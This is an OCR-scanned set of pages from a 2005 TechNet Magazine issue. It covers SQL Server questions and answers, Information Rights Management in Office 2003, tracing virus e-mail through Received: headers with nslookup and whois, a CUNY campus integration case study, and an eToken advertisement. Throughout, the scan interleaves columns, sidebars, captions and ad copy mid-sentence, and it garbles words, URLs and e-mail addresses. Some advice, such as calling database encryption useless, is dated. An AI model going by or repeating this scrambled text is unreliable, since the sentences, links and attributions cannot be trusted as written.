Express Edition. Connecting to the 
Express Edition from a downlevel 
client consists of four steps: 
making sure the Express Edition is 
running correctly, enabling the 
necessary protocols for SQLEX- 
PRESS (the Named Pipes and TCP 
protocols), restarting the Express 
Edition, and finally starting the 
SQL Browser service with the net 
start sqlbrowser command. 


www.technetmagazine.com 


Edited by Nancy Michell SO | 


SOL Server Express, Encrypting Data, and More 


A database generator 

The SQL Namespace Browser (for SQL 
Namespace objects) 

A Visual Basic’ to T-SQL Converter 
SQL Synchronization Tools 


Read more about the resource kit at | 


www.microsoft.com/resources/documentation/sql/7/ 
all/reskit/en-us/part6/sqc08.mspx. Dell and 


Back For 


ee SQLServer. 2000 System Table Map 


HP also have online hardware sizinges- = 62 


QUESTIONS & ANSWERS 


files, it might be better to create two files— 
one with inserts and another with updates 
only. This way you can bulk insert the new 
rows using bulk copy and use a worktable 
approach for updates. 

However, the best all-around way to do 
this is to use Data Transformation Services 


ae 
wind Feet Pid 


timates for SQL Server (including the 
equipment they recommend for your 
particular application). 


ver 2000 System Table Map. 


Click a table below for table details. 


IDX! 


SQL Server System 
Tables Map 


System Tables Map 


Backup Tables in 


ke ippi 
rape ello the msdb Database 


in the msdb Database 


Replication Tables in 
Each User Database 


System Tables in the 
SO ee et erent a bles. Master Database Only 


Where can I get a copy of a 
SQL Server system tables map? 


The system tables map can be |. 


Replication Tables in Each 
distribution Database 


Database Maintenance Plan 
Tables in the msdb Database 


System Tables in 
Every Database 


found at www.microsoft.com/sql/techinfo/pro- 
ductdoc/2000/systables.asp. The file is an 
HTML Help file that lets you drill down 
into each kind of table to discover its child 
tables, column names, data types, and their 


descriptions. Figure 1 shows the first page — 


of the interface. 


Import Data from Text 


What’s the best way to import 
data from text files into SQL Server where a 


_ mix of inserts and updates is required? 


Using a worktable is one way to do 
this. Bulk-load features in SQL Server only 
provide fast insert capabilities. If you have 
control over the process that creates the text 


Figure 1 System Tables 


(DTS). It can handle the mix of inserts and 
updates more elegantly and more efficiently 
that any other method, and it provides the 
same benefits as using Bulk Copy Program 
(BCP) and worktables. 


Cancel Long Queries 


What’ the best way to terminate 
long-running queries launched from 
ASP.NET? The queries could be against the 


_ relational SQL databases or against online 


analytical processing (OLAP) cubes. 


To begin, run the query on its own 
thread, asynchronously for example; then 


Winter 2005 11 


0 
~ 

0 
QO 
ol 
Le) 
WM 


| have a SOL Server 2000 SP3 database schema which is a 
build of Table A with a foreign key to Table B. Because the data in 
Table B is sensitive, | keep it encrypted, but that’s not secure 
enough for my needs. | am looking for a best-practice solution to 
be able to hide the relationship between the two tables—even 
from the database administrator of the system. 


Database administrators sometimes encrypt the data in- 
side a SOL Server database. Usually this is the wrong path to take. 
If you build a secure box, audit it, and protect access with tight 
access control, there is really no point in encrypting the data itself. 
This creates many issues including overhead, sorting, stored pro- 
cedures, and more. 

Furthermore, there is no way to “encrypt” the database schema. 
That said, you can hide the data and the objects from the data- 
base administrator by using explicit deny and not giving him 
permissions as owner. However, using deny complicates your 
database design while offering no real advantages beyond what 
auditing access and controlling System Administrator role mem- 
bership will provide. Consider the fact that the majority of the 
most sensitive data in the world resides on mainframe databases 


without encryption. 


If you really must implement encryption, even though threat 
modeling will show how useless it is, at least do it with SOL Server 
2005. With the .NET integration of this upcoming version, it will 
help you minimize the performance hit. 


use the Cancel method for the ADO.NET 
or ADOMD.net command object. 

There is no difference between the Can- 
cel method for ADO.NET and ADO- 
MD.NET. Both senda request to the server 


(through MSOLAP or directly to SQL | 
Server) to cancel the currently running | 


command. What is sent to the server de- 
pends on the underlying library being used 
to access SQL Server. Ultimately, the request 
is not sent in XML; it is sent as a Tabular 
Data Stream (TDS) token that instructs the 
server to cancel the connection’s currently 
running query. The API responsible for do- 


ing this might be called from SQLClient, | 


OLE DB, ODBC, or DB-Library, but ulti- 
mately they all resolve to the same thing: a 
TDS that instructs the server to terminate 
the current user’s query. 

Note that this does nothing to the thread 
per se, and this doesn’t work against the 
XML for Analysis (XMLA) SDK. XMLA 


will attempt to cancel queries in SQL Server 


2005 by sending the cancel request to the 
server, but this is not guaranteed to be an 
immediate operation. 


12 TechNet Magazine 


Consider not including such a large di- 
mension in the cube. Why put the users ina 


| position where they need to cancel? To 


avoid this, you can build a virtual cube and 
remove the offending dimension. 


Max Worker Threads 


What value should the Max 
Worker Threads in SQL Server be set to in 
order to support 3,000 concurrent users? 


By default the Max Worker Threads 
setting is 255, which means that up to 255 
worker threads are allowed to be created. 
The default setting of 255 works well most 
of the time. This does not mean, though, 


Thanks to the following Microsoft professionals for their 
technical expertise: Nader Albussam, Rashid Jean-Baptiste, 
Sasha (Alexander) Berger, Christian Bolton, Tom Carey, Robert 


LoForte, Han Pin Loke, Simona Marin, Akshai Mirchandani, 
Josh Moody, Maxwell Myrick, Savitha Padmanabhan, Ward 


Pond, Venkata Popuri, Stephen Quinn, Simon Rapier, Gandhi 


Swaminathan, Kadri Umay, Madhusudhanan Vadlamaani, Eric | {races and Perfmon logs collected during 


Weaver, Gary Zaika, and Ning Zhu. 


| that you can only establish 255 user con- 
: nections. A system can have thousands of 


user connections (which are essentially 


_ multiplexed down to 255 worker threads) 
' and, in general, users do not perceive any 
| delays. In sucha case, only 255 queries can 


run concurrently, but this is multiplexed 
down to the number of available CPUs, so 


| the concurrency is only a perception any- 
| way, regardless of the number of config- 
: ured worker threads. 


If you configure a number of worker 


_ threads to a value that is greater than the 


default, it is almost always counterproduc- 


' tive and slows performance because of 
| scheduling and resource overhead. Only in- 
| crease this setting under very unusual cir- 


cumstances and when rigorous methodical 


| testing demonstrates that it is useful to do 


so. Knowledge Base article 319942 (“De- 


_ termine Proper SQL Server Configuration 
' Settings” at support.microsoft.com/?kbid=319942) 


explains the issue. 


Is there a way to calculate the 


' amount of system resources that would be 
» used when increasing the Max Worker 


Threads setting from 255 to 500? 


You should calculate memory 
consumption at 0.5MB per thread, but you 


_ should first try to define what problem 
| youre trying to solve. Increasing this set- 
_ ting will waste 512KB of virtual memory 


address space for each additional worker 
thread. It's quite common for 255 worker 


' threads to service thousands of user con- 
' nections. There is no hard affinity between 
' Unified Messaging Server (UMS) workers 


and user connections. 
Unfortunately, there isn’t a lot of good 


' information out there on how UMS works. 


SQL Server 2000 Books Online contains 
useful information about Max Worker 
Threads and performance (../Books/ad- 
minsql.chm::/ad_config_09wu.htm.) 
You can determine for sure whether a 


eee _ lack of worker threads is the cause of any of 
Dorr, Brian Goldstein, Cindy Gross, Ken Henderson, Abdy Iman, 


Umachandar Jayachandran, Dinesh Krishnamoorthy, Ross | : 
. sqlperf(umsstats) during the slowdowns. 


your bottlenecks by simply checking dbcc 
Some basic diagnostics such as Profiler 


the slowdowns would be useful. @ 


rere information lives 


ts reseryed, 


point 
Micresoft VeriSign ee, (a) Computer Associates™ 


oe 
cer™ 


YOUR VPN ACCESS. AL YOUR SECURE KEY STORAGE. 


| YOUR NETWORK ACCESS. se YOUR SECURE CERTIFICATE STORAGE. 


YOUR WEB ACCESS. YOUR SECURE PASSWORD STORAGE. 


YOUR EMAIL ACCESS & CONFIDENTIALITY. [ YOUR SECURE KEY GENERATOR. 


YOUR COMPUTER BOOT & FILES PROTECTION. YOUR USERS’ SELF-ENROLLMENT KEY. 


It's your digital identity organizer. 


| Just one secure device for all your passwords, keys, and certificates. 


Su tories ana mo! NOW @lOKE 1 Se 


North America: 1-800-562-2543, 1-847-818-3800, eloken.us@eAladdin.com 

UK: +44-1'753-622-266, eloken.uk@eAladdin.com | Germany: +49-89-89-4221-0, eloken.de@eAladdin.com 
Benelux: +31-30-688-0800, eloken.nl@eAjaddin.com | France: +33-1-41-37-70-30, eloken tr@eAladdin:com 
Israel: +972-3-6362313, eloken.il@eAladdin.com | Japan: +81-426-607-191, eToken jp@eAladdin.com SECURING T VILLAGE 
Spain: +34-91-375-99-00, eloken.es@eAladdin.com | Asia Pacific: +852-9166-8605, eloken@eAladdin.com Aladdi 
International: +972-3-6362222, efoken@eAladdin.com 


©2004 Aladdin: Knowledge Systems, Ltd, All rights reserved. Aladdin is a registered trade- 
Cisco, Cisco Systems, :he Cisco Systems togo are registered trademarks or trademarks Mark and eTokeh is a trademark of Aladdin Knowledge Systems, (td. All other company 
Of Cisca Systems, Iitc: and/or its affiliates in the US and certain other countries, and product names are trademarks or registered trademarks of thelr respective owners. 


OFFICE 


Information Rights Management in Office 2003 
Alok Mehta 


Today's knowledge workers deal with | 


sensitive information all the time. This 
information comes in a variety of 
formats such as Microsoft Word, Excel, 
PowerPoint®, and e-mail documents, 
and it must all be protected from un- 
authorized access and distribution. For 
a long time, there has been a need 
for a technology that can encrypt this 
kind of information, allowing access 
to authorized persons only, and en- 
forcing those rights restrictions every- 
where that a document goes. In 
addition, authors should be able to 
define the duration for which recipi- 
ents can read a document, as well as 
whether they can print, forward, edit, 


extract its contents, or save an 


unprotected version. 

It should also be possible to extend 
these restrictions to other documents 
as well. In other words, restrictions 
should be policy-based, which in turn 
should be template-based, so that 
organizations can easily define custom 
policies. Finally, this access control 


should integrate into applications | 


already in use by these organizations. 


IRM to the Rescue 

Information Rights Management (IRM) 
is a new feature of Microsoft’ Office 2003 
designed to enhance collaboration meth- 


ods by allowing the restrictions previously _ 
discussed to be placed in Word 2003, Excel 


Alok Mehta, PhD, is the CTO and Senior VP of AFS Technologies 
Inc. in Weston, MA where he is in charge of technology 
research and development. Alok has published several research 
papers on component-based software engineering and Web 
development. Reach him at amehta@afs-link.com. 


www.technetmagazine.com 


2003, PowerPoint 2003, and Outlook’ 2003 
documents. To this end, IRM uses encryp- 
tion, permissions, and ownership to restrict 
unauthorized access. 

IRM relies on Active Directory’ and 
Microsoft Windows” Rights Management 
Services (RMS)—a new service offered in 
Windows Server” 2003—and extends RMS 
to Microsoft Office 2003. RMS handles the 
licensing, machine certification/activation, 
user enrollment, and administrative func- 
tions. RMS is the engine on which IRM 
runs. RMS in turn relies on Windows Server 
Active Directory and uses Microsoft SQL 
Server” to store configuration data. For 
more about RMS, see the sidebar “The 
Foundation of IRM” 

On the desktop, creating or viewing 


' protected documents requires an RMS-en- 


abled application. See the sidebar “Require- 


| ments to Set Up IRM and RMS” for more 


detailed information. 


Additional Information 


RMS and IRM 


SPACE 


IRM is an information protection tech- 
nology that offers persistent file-level pro- 
tection. Once permission for a document 
or e-mail message has been restricted with 
IRM, these restrictions will always travel 


E-mails that contain 
confidential 
information can be 
easily forwarded to 
a competitor or 
a vendor. 


with the document or the e-mail message 
as part of the contents of the file in order to 
prevent sensitive information from being 
printed, forwarded, or copied by any unau- 
thorized individuals. 

In this column, I will explore the IRM 
feature and and how RMS works in the 


www. microsoft.com/technet/ prodtechnol/ office/ office2003/maintain/rmsirm.mspx 


RMS 


www.microsoft.com/downloads/details.aspx?familyid=be/fae0c-2db2-4f7f-8aa1-416fe1 b04fb1 


Windows RM Client 


www.microsoft.com/downloads/ details.aspx?familyid=3115a374-116d-4a6f-beb2-d6eb6fa66eec 


RMS SDK 


www.microsoft.com/downloads/details.aspx?familyid=2dfcafb9-3e7 b-4f70-b6d3-aecc965cd598 


RMS Client SDK 


www.microsoft.com/downloads/details.aspx?familyid=863dadce-d648-4d50-9392-b4faca34a0a8 
Rights Management Add-On for Internet Explorer 


www.microsoft.com/windows/ie/downloads/addon 


Winter 2005 15 


Policy persistent 


qwith IRM documents, 


Windows Server 2003 


Membership, 


( Ownership . 


RMS Licensed and 
Registered User/Machine 


Configuration 
Database 


e 1 RMS and IRM Interaction 


background. I’ll also briefly look at how to 
use IRM in Word 2003, Excel 2003, 
PowerPoint 2003, and Outlook 2003 from 
the IT professional’ point of view. Refer to 
Figure 1 for an overview of how RMS and 
IRM interact. It's important to note that 
RMS and IRM are not information secu- 
rity per se, but rather information protec- 
tion and policy enforcement. This can of 
course be a component of one’s informa- 
tion security strategy. 


E-mail is now one of the primary meth- 
ods of communication within and between 
institutions. E-mails that contain confiden- 


tial information can be easily forwarded, | 


even accidentally, to a competitor or a ven- 
dor. Rights-protected e-mail helps protect 
against leaks, especially the accidental type. 


IRM can be used in Microsoft Office Out- 
look 2003 to help prevent e-mail forward- 


ing, cutting, pasting, copying, editing, or 


printing. Protected messages are always en- 


crypted, and when the sender assigns rights 
to the message, Outlook 2003 enforces the 
prescribed rights by disabling the restricted 
commands so that the receiver can not for- 
ward, edit, copy, or print its contents. In 
addition, Office 2003 documents attached 


to protected messages inherit the same re- | 


strictions and are protected too. 


Here's an example of how IRM works 
with Outlook 2003 to implement privacy. 


16 TechNet Magazine 


John is an executive who needs to send 
his team a private e-mail with a Word 2003 
document attached. Using RMS, his com- 
pany has created an Organization Private 
template that automatically applies all of the 
appropriate rights as predefined by John’s 
IT group. John selects the template for his 
e-mail message, which also imparts the 
same set of restrictions to the attached Word 
2003 document. The Organization Private 
template says that only employees within 
the organization can read the information. 
As employees open the e-mail and the at- 


. tachment, RMS-enabled Outlook 2003 and 
_ Word 2003 enforce the rights and restric- 


tions on the document. Also specified by 
the Organization Private template, employ- 


' ees cannot cut, copy, save, or edit either the 
' e-mail message or the attached Word docu- 
| ment to an unsecured format. If they try to 


digitally share this information outside of 
the organization, the unauthorized recipi- 
ent will not be able to open the e-mail or 
the Word document. 

Now imagine that a team member sends 
a request to John asking permission to share 
the e-mail and attachment to an outside 
team that is working on the same project. 
The outside team uses a hosting provider 
for its RMS solution and is a trusted part- 
ner of John’s company’s RMS solution. John 
applies the appropriate rights for the out- 
side team and then sends the e-mail to 
members of that team, who can then view 
the e-mail and the document. 


Office 2003 documents can be protected 
on a per-user or group basis based on Ac- 
tive Directory. Each user or group can be 
given a set of permissions according to the 
rights defined by document owner. These 


rights allow the user to read, change, or have 
full control over the document. 

IRM disables commands that the par- 
ticular recipient does not have the right to 
execute. In addition to the aforementioned 
restrictions, owners can also set document 
expiration dates (which can be extended). 
After expiration, the document still exists, 


server. Nancy then receives an e-mail from 
Steve pointing her to the document's loca- 
tion. According to the rights that Steve set 


| for the document, Nancy can view and edit 
| it for one week only. She downloads the 


document to her laptop and opens it up for 


| review. Because the rights are persistent, 


they remain with the information, even if 


if an unauthorized recipient attempts to open a 
protected document, a message is displayed to 
inform the user that it is rights-protected. 


but it cannot be opened by anyone other | 


than the owner. 

If an unauthorized recipient attempts to 
open a protected document, a message is 
displayed to inform the user that it is rights- 
protected. The document owner has the 
option of providing their e-mail address in 
that message so the unauthorized recipient 
can request rights to access the document. 

The following scenario illustrates how 
IRM works to implement privacy. 

In RMS-enabled Word 2003, Steve uses 
the permissions option to set the rights for 
a document that he needs to share with an- 
other user, Nancy, in their branch office. 
Steve posts his document to an internal file 


the laptop is not connected to the LAN. 
After a week, Nancy determines that she 
needs additional time to review the docu- 
ment. As she can no longer open the doc, 
she requests that Steve grant her more time 
to continue reviewing it. Steve grants the 
permission by extending the expiration date 


and reposts the document. Nancy down- | 


loads this updated version and is able to 
continue reviewing the document as de- 
fined by the usage rights. 

Enforcement of rights is performed at the 
application level. Office 2003 is currently 
the only application from Microsoft that 
can create rights-protected docs. Microsoft 
provides a free Rights Management Add- 


Creare iGhts prosecten Mics anc: Contalicrs 


on for Internet Explorer that will enable us- 
ers without Office 2003 to view a rights- 
protected document. This add-on is 
available for download from www.micro- 
soft.com/windows/ie/downloads/addon. 


If you take a look at Figure 2, you'll see 
howa document or e-mail is protected with 


| RMS. The steps illustrated in the figure are 


explained here: 
4 The author receives a client licensor 
| certificate from the RMS server the first 
time they apply rights protection to a docu- 
ment. This step enables offline publishing 
of rights protected documents in the future. 
“) Usingan RMS-enabled application, the 
&.. author creates a file and defines a set of 
usage rights and conditions for that file. A 
publishing license is then generated that 
contains the usage policies. The application 
then encrypts the file with a symmetric key, 
which is then encrypted with the public key 
of the author’s RMS server. The key is then 
inserted into the publishing license and the 
publishing license is bound to the file. Only 
the author’s RMS server can issue use li- 
censes to decrypt this file. The author then 
distributes the file. 


Aceuie Nicenses to SEChypE TiGhis plotecice SecuImeHts 


Ricense anc Oiscnouie fights protected GocuIments 


www.technetmagazine.com 


Winter 2005 17 


Configuration 
Database 


RMS-enabled Word 
2003 Recipient 


RMS-enabled Word | 
2003 Author Uses | 
IRM | 


Figure 2 RMS Protection 


3 A recipient receives a rights-protected file through any distribution mechanism and 
opens it using an RMS-enabled application or browser. If the recipient does not have 
an account certificate on the current computer, the user will now be issued one. 
The application sends a request for a use license to the RMS server that issued the 
publishing license for the protected information. The request includes the recipient's 
account certificate, which contains the recipient's public key, and the publishing license, 


which contains the symmetric key that encrypted the file. A publishing license issued bya 


client licensor certificate includes the URL of the server that issued the certificate. In this 

case, the request for a use license goes to the RMS server that issued the client licensor 

certificate and not to the actual computer that issued the publishing license. 

5 The RMS licensing server validates that the recipient is authorized, checks that the 
recipient is a named user, and creates a use license. 


IRM and RMS help protect information through 


persistent usage policies, which remain with the 
information no matter where it goes. 


During this process, the server decrypts the symmetric key using the private key of 


recipient can decrypt the symmetric key and thus decrypt the protected file. The server 
also adds any relevant conditions to the use license, such as the expiration of an applica- 
tion or operating system exclusion. When the validation is complete, the licensing server 
returns the use license to the recipient's client computer. 

After receiving the use license, the application examines both the license and the 


recipient's account certificate to determine whether any certificate in either chain of | 
trust requires a revocation list. If so, the application checks for a local copy of the revoca- 


tion list that has not expired. If necessary, it retrieves a current copy of the revocation list. 
The application then applies any revocation conditions that are relevant in the current 
context. If no revocation condition blocks access to the file, the application renders the 
data, and the user may exercise the rights they have been granted. 

This process is essentially the same whether the recipient is within the publishing 


18 TechNet Magazine 


organization or outside of it. The recipient 
is not required to be inside the author's net- 
work or domain to request a use license. All 
that is required is a valid account certificate 
for the recipient and access to the licensing 
server that issued the publishing license. 
RMS can be set up to enable external 
sharing of rights-protected documents. Us- 
ers can share information with other trusted 


' users over the Internet. This deployment 
| offers the same level of protection as an in- 


tra-company RMS deployment because an 
RMS server must license the rights that are 
attached to a rights-protected file. 


Deploying RMS 

The process of deploying RMS consists 
of the following steps: 
Hardware Setup See the hardware, soft- 
ware, and infrastructure requirements de- 
scribed in www.microsoft.com/technet/prodtechnol/ 
office/office2003/maintain/rmsirm.mspx. 
RMS Server Setup Install, enroll, and 
register the RMS server software. During 
the enrollment process, the administrator 
installs RMS server software on the root 
server. The version of RMS installed on the 
server and the organization’s URL is col- 
lected, and a public/private key pair is cre- 
ated. The server sends the public key along 
with the RMS version and URL informa- 
tion to the RMS Server Enrollment Service 
in a request for a RMS Licensor Certificate. 
The RMS Server Enrollment Service re- 
turns the RMS Licensor Certificate. Enroll- 
ment using the RMS Server Enrollment 


| Service is required for at least one server 


within every RMS system. Servers added 
subsequently to the RMS root cluster use 


_ the same RMS Licensor Certificate. When 
the server, re-encrypts the symmetric key using the public key of the recipient, and — 
adds the encrypted session key to the use license. This step ensures that only the intended — 


you add a new server to an existing root 
installation or licensing-only server cluster, 
the new server is not explicitly enrolled be- 


' cause it takes on the entire existing con- 


figuration of the cluster. 

RMS server(s) can be configured along 
with Windows Load Balancing Services 
(WLBS), and there are several possible to- 
pologies of RMS server configurations. Fig- 
ure 3 shows a typical RMS topology. 

RMS Client Setup Every client com- 
puter that will participate in the RMS sys- 


' tem must be set up so that it is established 


asa trusted entity within the system. Client 


computer setup consists of verifying the 
presence of the RMS Client component and 
activating the client computer. After a client 
computer is set up, the infrastructure is in 


place to permit users with RMS-enabled | 


applications to publish and consume rights- 
protected data. Each client computer must 
have the RMS Client component installed. 
This component is available from the Win- 


dows Update Catalog or from the Microsoft 


Download Web site (www.microsoft.com/down- 
loads). In the next version of Windows, the 
client component will be built into the op- 


erating system. Software deployment tools _ 
such as Microsoft Systems Management — 


Server (SMS) can ensure that clients have 
the component installed or can rely on the 


installation of an RMS-enabled app to ini- | 


tiate the request to the Windows Update 
Catalog for the component. This compo- 
nent is required by RMS-enabled apps and 
is used for the client activation process. 

Register RMS Users When a user at- 


IRM in Microsoft Office 2003 programs), 
the following occurs. First, the machine ob- 
tains a certificate that activates it as a com- 
puter capable of creating protected content. 
The user then obtains a certificate that as- 
sociates him or her with that computer, and 
enables the creation of protected content. 


You will need Microsoft Windows 
Server 2003 with Windows Rights 
Management Services (RMS) to en- 
able IRM in Office 2003. RMS is 
designed to make the most of ex- 
isting infrastructure investments by 
using Active Directory Discovery and 
Windows NT LAN Manager (NTLM) 
authentication. At the server level, 
the following is needed to run RMS: 
1.Windows Server 2003 with RMS 
server software. RMS is a new ser- 
vice for Windows Server 2003 
Standard, Enterprise, Web, and 
Datacenter editions. 
2. Internet Information Services. 
3.Windows Server Active Directory 
service (Windows Server 2000 or 
later). Active Directory accounts are 
used to acquire and use licenses. 


www.technetmagazine.com 


ADS 
Database 


Secondary 
RMS Server 
Load Balance 


Configuration 
Database 


Secondary 
RMS Server 
Licensing and Load Balance 


Certification 


RMS-enabled 
Application 


Figure 3 RMS Topology 


IRM deployment depends upon RMS 
deployment. As RMS is deployed, IRM de- 
ploymentis as simple as installing the RMS 


~ Client at the desktop and deploying Office 
tempts to use RMS (for example, by using — 


2003. The client machine and each user 
then receive a certificate allowing IRM us- 
age as I described in the previous subsec- 
tion “Register RMS Users.” 


Conclusion 
To protect sensitive information such as 
customer data, financial reports, product 


Requirements to Set Up IRM and RMS 


4.A database, such as Microsoft SOL 
Server to store configuration data. 
To take advantage of this new tech- 

nology, you must also install the RMS 

Client. You will need administrative 

rights to install this client on your 

computer and ensure it functions 
properly. The following must be in- 
stalled at the client machine: 

1.RMS Client software. 

2.An RMS-enabled application is re- 
quired for creating or viewing 
rights-protected content. 
Microsoft Office 2003 includes four 

RMS-enabled applications available 

from Microsoft: Outlook 2003, Word 

2003, Excel 2003, and PowerPoint 

2003. Microsoft Office Professional 

Edition 2003 is required for creating 

or viewing rights-protected Microsoft 


specifications, and confidential e-mail mes- 
sages, you need a strategy. Information 
Rights Managements and Windows Rights 
Management Services help protect infor- 
mation through persistent usage policies, 
which remain with the information no mat- 
ter where it goes. If you intend to use Win- 
dows Server 2003, you should consider an 
RMS/IRM solution. RMS is simple to set 
up and IRM very easy to use, so I highly 
recommend these two technologies as part 
of your overall data security solution. © 


Office System documents such as 
spreadsheets, presentations, and e- 
mail messages. 

Other Office 2003 Editions allow 
designated users to view and edit 
rights-protected documents if they 
have been given those rights by the 
author. They cannot create rights-pro- 
tected content. 

Microsoft also offers a free trial for 
customers who do not have Windows 
Server 2003. This service will enable 
users to share documents and mes- 
sages with restricted permission using 
Microsoft .NET Passport as the au- 
thentication mechanism, as opposed 
to Active Directory. Please visit the 
Office Web site at office.microsoft.com/as- 
sistance/preview.aspx?AssetID=HA010721681033 
for free trial service of IRM. 


Winter 2005 19 


how 


R’ykandar Korra’t 


A sanetwork administrator, youve just 
seen fifty copies of the same e-mail — 
virus sent to your users. How do you know | 
which machine is infected? Is it someone — 


inside your own company or someone ex- 
ternal you can block? 


Often, you can isolate it to a single ma- | 
chine by analyzing the one portion of the 


header your own e-mail server provides. 


Figure 1 shows a real-life example (all real 


names have been changed). 
The important data is in the Received: 


line. Each time a server receives an SMTP — 
~ so you can just ignore it. 
ceived: line at the beginning of the header — 
_ by my server consisted only of the IP ad- 
' dress of the machine handing me the mes- 
- sage—69.66.109.194. That’s the least 


message, it is supposed to add a new Re- 


block. The topmost line will have been 
added by your server. 
My e-mail server added the topmost line 


in this example; since there are no other _ 
_ may also be a machine name before the IP 
address, but still within the parentheses. If | 
present, it is also trustworthy information - 


Received: lines further below it, it is prob- 


ably safe to assume that it was delivered di- 
rectly to my system by an embedded | 
mini-SMTP engine running onan infected 
machine. Had there been more than one — 


Received: line, the first one might have been 
a relaying mail server. As servers are not as 


to skip down to the second entry. 
The Received: line provides information 
in this format: 


Received: from <info supplied by sender- 
untrustworthy> (<info provided by our server- 
trustworthy>) by <our server> with <protocol> 
<message I1D> {for <email address>}; <date> 


Your concern should lie with the infor- 


R’ykandar (Dara) Korra’ti, a glass sculptor, lives in Seattle | 
with her partner Anna, and is postmaster for a small co-op ISP. 
Having shipped many e-mail products, she retired from 


Microsoft in 1999 to focus on her art career. 


20 TechNet Magazine 


Figure 1 Analyzing E-mail 


Received: from microsoft.net ([69.66.109.194]) 
by lodestone.microsoft.net with ESMTP 
id HAA19424 
for <sample@microsoft.net>; Fri, 
2004 07:30:22 -0800 

From: firstname. lastname@sample.state.ia.us 

Message-Id: 

<200403051530.HAA19424@1 odestone.microsoft.net> 

To: sample@microsoft.net 

Subject: Re: Your bill 

Date: Fri, 5 Mar 2004 09:36:35 -0600 

X-Priority: 3 

X-MSMail-Priority: Normal 


5 Mar 


always be invalid in virus and spam mail, 


In this example, the information added 


amount of information youll get. There 


and saves you the next step. 


Two tools are needed to discover and | 
verify the name of this machine and the | 
| owner of its domain: nslookup (host, on | 
likely to be infected as clients, you may want _ 
_ nslookup and host provide DNS lookups _ 
| against hostnames or IP addresses: 


some operating systems) and whois. Both 


C:\>nslookup 69.66.109.194 


194.109.66.69.in-addr.arpa domain name pointer 
dwtt-00-0194.ds1.cascadiatelecom.net. 


I now know the sender is in the domain | 


_ cascadiatelecom.net. I’ve already learned 


mation provided by your server; that’s the _ that Cascadia Telecom supports reverse- 


data in parentheses following the “from” in- _ DNS lookups, although not all network — 


formation supplied by the sender. The — providers do. For those that don’t, you must 


sender-provided information will almost | 


apply the whois tool. 


To oversimplify a bit, whois provides in- 
formation about domains rather than indi- | 
' vidual hosts. This tool is generally used to 


| works 


rks 


Lis mail Header: | mail Heade 


identify the owner of a particular domain, 


as shown in Figure 2. Whois can also be 
__ used to identify the owner of an IP address, 
' or range of IP addresses, when you don’t 
' know the name of the domain. A network 
: of top-level whois servers exists for this pur- 
_ pose. These are whois.apnic.net (Asia-Pa- 
cific), whois.arin.net (Americas), and 
' whois.ripe.net (Europe), covering different 
' geographical domains. As a rule of thumb, 
| test against the server your geographical 
area first; if that fails, keep going until you 
_ find one that works. I already know my ex- 
- ample is in North America, but if I didn’t, 
_ that’s where I'd start (see Figure 3). 


With any batch of virus mail received, 


_ you'll see a cacophony of sender-provided 
_ misinformation. But with a little analysis, 


youll often find most of it actually came 
from one or two infected (and easily 
blocked and disinfected) machines. ® 


Figure 2 The Domain Owner 


Domain Name: MICROSOFT.COM 
Registrar: TUCOWS INC. 
Whois Server: whois.opensrs.net 
Referral URL: http://domainhelp.tucows.com 
Name Server: NS3.MSFT.NET 
Name Server: NS1.MSFT.NET 
Name Server: NS2.MSFT.NET 
Name Server: NS5.MSFT.NET 
Name Server: NS4.MSFT.NET 
Updated Date: 23-jun-2004 
Creation Date: 02-may-1991 
Expiration Date: 03-may-2014 


Figure 3 The IP Address Owner 


OrgName: Cascadia Telecom 
NetRange:  69.66.0.0 - 69.66.255.255 
CIDR: 69.66.0.0/16 

NetName: CASCADIA-TELECOM 


NameServer: AR.CASCADIATELECOM. NET 
NameServer: HE.CASCADIATELECOM. NET 


OrgTechName: Cascadia Telecom NOC 
OrgTechPhone: +1-877-555-1212 
OrgTechEmail: noc@cascadiatelecom.net 


Dissecting a Successful Campus Integration Project 


The Project: 


Two colleges in the City University of New York (CUNY) | 
system needed to implement a student retention sys- | 
tem. The system, a client/server application, would sit _ 


beside an IBM mainframe. 


Challenges: 


= The colleges had no existing security architecture, | 
meaning that the network was compromised on a | 


regular basis. 
& 


other used SOL Server™ 2000. 


a The IT department had no trained personnel avail- | 


able to serve as a project liaison. 


= The consultant had to guarantee the integrity of the | 
software and data without the authority or funding to | 


implement additional solutions outside of their own. 


The Plan: 


The consultant would implement the student retention | 
system in three phases. First, Lehman College would | 
get its system in place, followed by Bronx Community | 
College (BCC) in the second phase. Finally, the two | 
colleges would be linked. The consultant turned to | 
Microsoft technologies as a common baseline for each | 
site, plugging them into the existing environment while | 
allowing CUNY to avoid costly and disruptive changes | 


to their infrastructure. 


The Consultant: 


ATSI, Adaptive Technology Solutions Inc. (www.a-tsi.com), is 
a software development and consulting firm specializ- | 
ing in collaborative applications. The company focuses _ 


The colleges also had no operating system standard, — 
so the solution had to work cross-platform. One col- | 
lege used Oracle 9i as its database system, while the | 


Theresa Auricchio 


on improving operations and communications by stream- 
lining business processes. They specialize in administra- 
tive processes and centralized records storage in 
education, finance, telecommunications, and government. 


| Background: 


The CUNY system is academically rich, but resources 
are extremely limited. The core student information 
system, which encompasses finance, course schedule, 
and student registration, resides on an IBM mainframe. 
What you see on the mainframe is what you get; new 
routines and reports are not feasible since Lehman 
College employs a single, desperately overworked main- 
frame programmer. 

As the college and the diversity of its population 
grew over the years, educators found that individuals 
were getting lost in the system. There was no way to 
formally identify students needing assistance. The drop- 
out rate was suspected to be higher in certain student 
populations, but this was difficult to measure. 

A Title V grant opened up possibilities for Lehman 
College educators and administrators. New data be- 
yond registration, financial aid, and grades could now 
be harnessed, so administrators went to work deciding 
what they would need to move ahead. 

Since it would prove to be a problem incorporating 
all this data into the existing IBM mainframe, the ATSI 
project team decided that the new system would have 
to stand side-by-side with the IBM mainframe as a 
client-server application. Problems with the university's 
network security ended up ruling out the use of Web 
applications. The only workstation requirement on the 
client is that the operating system should be Windows® 
2000 or Windows XP. 


How They Pulled It Off long-range academic plans, advising tools, created a routine to populate the SRDS 
The final goal at Lehman College isastu- faculty data entry screens, and reporting. Oracle9i database with collected data that 
dent retention app called the Student Re- To take advantage of existing data, ATSI__ was stored on the mainframe. translation 


tention and Development System (SRDS) theresa Auricchio is President/Principle Consultant of AVI Consulting Inc. in New York state. She consults and speaks on 
consisting of survey data, referrals data, — e-business topics, and was recently appointed to the board of mm1Media. Reach Theresa at auricchio@aviconsulting.com. 


www.technetmagazine.com Winter 2005 21 


table was created to give user-friendly | 
meaning to those pesky mainframe num- _ 
ber codes (56784 would now read “fresh- 
man,’980 would mean “English 101) to give © 


acouple examples). 


On top of this translation layer, the ATSI _ 
project team developed a graphical user in- 
terface in Microsoft” Access 2000 with — 
